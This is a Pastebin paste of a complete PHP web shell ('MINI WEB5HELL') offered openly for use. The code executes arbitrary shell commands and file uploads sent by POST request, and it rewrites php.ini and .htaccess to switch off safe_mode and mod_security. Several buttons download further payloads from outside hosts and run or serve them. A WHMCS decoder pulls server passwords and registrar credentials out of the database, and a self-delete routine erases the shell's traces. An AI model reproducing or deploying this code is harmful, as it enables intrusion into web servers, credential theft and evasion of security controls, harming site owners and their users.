Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php //Jangan Pernah Ragu....!!! Lakukanlah...!!! ?>
- <title>MINI WEB5HELL</title><body bgcolor=silver><center>
- <div style=background:#3b0001;margin:0px;padding:7px;text-align:center;color:silver;>
- <div style=background:black;margin:0px;padding:3px;text-align:center;color:silver;><i><b><font color=lime>© </font><a href=mailto:cyberserkers@gmail.com>AZZATSSINS CYBERSERKERS</a></b></i><br></div><div style=background:#2e2e2e;margin:0px;padding:4px;text-align:center;color:silver;><i><b><form method="post"><input style="background:dodgerblue;margin:1px;width:15%;padding:0px;color:red;border:0;font-weight:bold;" name="config" value="CONFIG" type="submit"><br><input style="background:dodgerblue;margin:1px;width:15%;padding:0px;color:red;border:0;font-weight:bold;" name="mysql" value="MYSQL" type="submit"> <input style="background:dodgerblue;margin:1px;width:15%;padding:0px;color:red;border:0;font-weight:bold;" name="symlink" value="SYMLINK" type="submit"><br><input style="background:dodgerblue;margin:1px;width:15%;padding:0px;color:red;border:0;font-weight:bold;" name="wdecode" value="DWHM" type="submit"> <input style="background:dodgerblue;margin:1px;width:15%;padding:0px;color:red;border:0;font-weight:bold;" name="rwhm" value="RWHM" type="submit"> <input style="background:dodgerblue;margin:1px;width:15%;padding:0px;color:red;border:0;font-weight:bold;" name="dead" value="KILLSELF" type="submit"></form></b></i></div></center>
- <?php
- @session_start();
- @error_reporting(0);
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @ini_set('display_errors', 0);
- @set_time_limit(0);
- @set_magic_quotes_runtime(0);
- echo ini_get("safe_mode");
- echo ini_get("open_basedir");
- ini_restore("safe_mode");
- ini_restore("open_basedir"); $phi = fopen("php.ini","w+");
- fwrite($phi,"safe_mode = Off
- disable_functions = NONE
- safe_mode_gid = OFF
- open_basedir = OFF ");$phii = fopen(".htaccess","w+");
- fwrite($phii,"<IfModule mod_security.c>
- KillFilterEngine Off
- KillFilterScanPOST Off
- KillFilterCheckURLEncoding Off
- KillFilterCheckUnicodeEncoding Off
- </IfModule>
- ");
- $currentWD = str_replace("\\\\","\\",$_POST['_cwd']);
- $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
- $UName = `uname -a`;
- $SCWD = `pwd`;
- $UserID = `id`;
- if( $currentWD == "" ) {
- $currentWD = $SCWD;
- }
- if( $_POST['_act'] == "List!" ) {
- $currentCMD = "ls -la";
- }
- echo "<center><div style=background:black;margin:0px;padding:6px;text-align:center;color:silver;><div style=background:#222222;margin:0px;padding:6px;text-align:center;color:silver;><form method=post enctype='multipart/form-data'><b>CMD <input size=10 name='_cmd' value='".$currentCMD."'><input style='background:dodgerblue;margin:1px;width:15%;padding:0px;color:red;border:0;font-weight:bold;' type=submit name=_act value='EXEC'> <b>DIR <input size=10 name='_cwd' value='".$currentWD."'><input style='background:dodgerblue;margin:1px;width:15%;padding:0px;color:red;border:0;font-weight:bold;' type=submit name=_act value='List!'><br><input size=10 type=file name=_upl><input style='background:dodgerblue;margin:1px;width:15%;padding:0px;color:red;border:0;font-weight:bold;' type=submit name=_act value='UPLOAD'></form></div></div></center><br><hr><br>";
- if($_POST['symlink']){
- $get = file_get_contents('http://x-x-x.yn.lt/py');
- $bwt = fopen('symlink.py', 'w');
- fwrite($bwt,$get);
- fclose($bwt);
- system('python symlink.py');system('rm symlink.py');
- echo'<meta http-equiv="Refresh" content= "0; url=sl">'; }
- if($_POST['rwhm']){
- $get = file_get_contents('http://wget.yu.tl/files/ah.css');
- $bwt = fopen('rw.php', 'w');
- fwrite($bwt,$get);
- fclose($bwt);
- echo'<meta http-equiv="Refresh" content= "0; url=rw.php">';
- }
- if($_POST['config']){
- $get = file_get_contents('http://pastebin.com/raw/upPW1A8Y');
- $bwt = fopen('cg.php', 'w');
- fwrite($bwt,$get);
- fclose($bwt);
- echo'<meta http-equiv="Refresh" content= "0; url=cg.php">';
- }
- if($_POST['mysql']){
- $get = file_get_contents('http://wget.yu.tl/files/mysql.css');
- $bwt = fopen('mysql.php', 'w');
- fwrite($bwt,$get);
- fclose($bwt);
- echo'<meta http-equiv="Refresh" content= "0; url=mysql.php">';
- }
- if($_POST['dead']){
- system("rm -rf CONFIG");system("rm symlink.py"); system("rm mysql.php"); system("rm -rf sl");system("rm rw.php");system("rm php.ini");system("rm.htaccess");system("rm cg.php"); unlink('cg.php'); $fn=$_SERVER['SCRIPT_FILENAME'];unlink($fn); system("rm ".$fn); echo'<meta http-equiv="Refresh" content= "0; url=?">';
- }
- if($_POST['wdecode']){
- function decrypt ($string,$cc_encryption_hash)
- {
- $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
- $hash_key = _hash ($key);
- $hash_length = strlen ($hash_key);
- $string = base64_decode ($string);
- $tmp_iv = substr ($string, 0, $hash_length);
- $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
- $iv = $out = '';
- $c = 0;
- while ($c < $hash_length)
- {
- $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
- ++$c;
- }
- $key = $iv;
- $c = 0;
- while ($c < strlen ($string))
- {
- if (($c != 0 AND $c % $hash_length == 0))
- {
- $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
- }
- $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
- ++$c;
- }
- return $out;
- }
- function _hash ($string)
- {
- if (function_exists ('sha1'))
- {
- $hash = sha1 ($string);
- }
- else
- {
- $hash = md5 ($string);
- }
- $out = '';
- $c = 0;
- while ($c < strlen ($hash))
- {
- $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
- $c += 2;
- }
- return $out;
- }
- echo "
- <br>
- <FORM method='post'>
- <input type='hidden' name='form_action' value='2'>
- <br>
- <table class=tabnet style=width:320px;padding:0 1px;>
- <tr><th colspan=2>WHMCS Decoder</th></tr>
- <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
- <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
- <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
- <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
- <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
- <td> <INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:' value='Submit' name='Submit'></td>
- </table>
- </FORM>
- </center>
- ";
- if($_POST['form_action'] == 2 )
- {
- //include($file);
- $db_host=($_POST['db_host']);
- $db_username=($_POST['db_username']);
- $db_password=($_POST['db_password']);
- $db_name=($_POST['db_name']);
- $cc_encryption_hash=($_POST['cc_encryption_hash']);
- $link=mysql_connect($db_host,$db_username,$db_password) ;
- mysql_select_db($db_name,$link) ;
- $query = mysql_query("SELECT * FROM tblservers");
- while($v = mysql_fetch_array($query)) {
- $ipaddress = $v['ipaddress'];
- $username = $v['username'];
- $type = $v['type'];
- $active = $v['active'];
- $hostname = $v['hostname'];
- echo("<center><table border='1'>");
- $password = decrypt ($v['password'], $cc_encryption_hash);
- echo("<tr><td>Type</td><td>$type</td></tr>");
- echo("<tr><td>Active</td><td>$active</td></tr>");
- echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
- echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
- echo("<tr><td>Username</td><td>$username</td></tr>");
- echo("<tr><td>Password</td><td>$password</td></tr>");
- echo "</table><br><br></center>";
- }
- $link=mysql_connect($db_host,$db_username,$db_password) ;
- mysql_select_db($db_name,$link) ;
- $query = mysql_query("SELECT * FROM tblregistrars");
- echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
- echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
- while($v = mysql_fetch_array($query)) {
- $registrar = $v['registrar'];
- $setting = $v['setting'];
- $value = decrypt ($v['value'], $cc_encryption_hash);
- if ($value=="") {
- $value=0;
- }
- $password = decrypt ($v['password'], $cc_encryption_hash);
- echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
- }
- }
- }
- $currentCMD = str_replace("\\\"","\"",$currentCMD);
- $currentCMD = str_replace("\\\'","\'",$currentCMD);
- if( $_POST['_act'] == "UPLOAD" ) {
- if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
- echo "<center><b>Error While Uploading File!</b></center>";
- } else {
- echo "<center><pre>";
- system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
- echo "</pre><b>File Uploaded Successfully!</b></center>";
- }
- } else {
- echo "<b><br><br><pre><br>";
- $currentCMD = "cd ".$currentWD.";".$currentCMD;
- system($currentCMD);
- echo "<br></pre><br></b>";
- }
- ?>
- <br><hr><br><center><b>[+] Go A Head [+]</b></center>
- <?php //What The MotherFucker Do You Want...??? ?>
Add Comment
Please, Sign In to add comment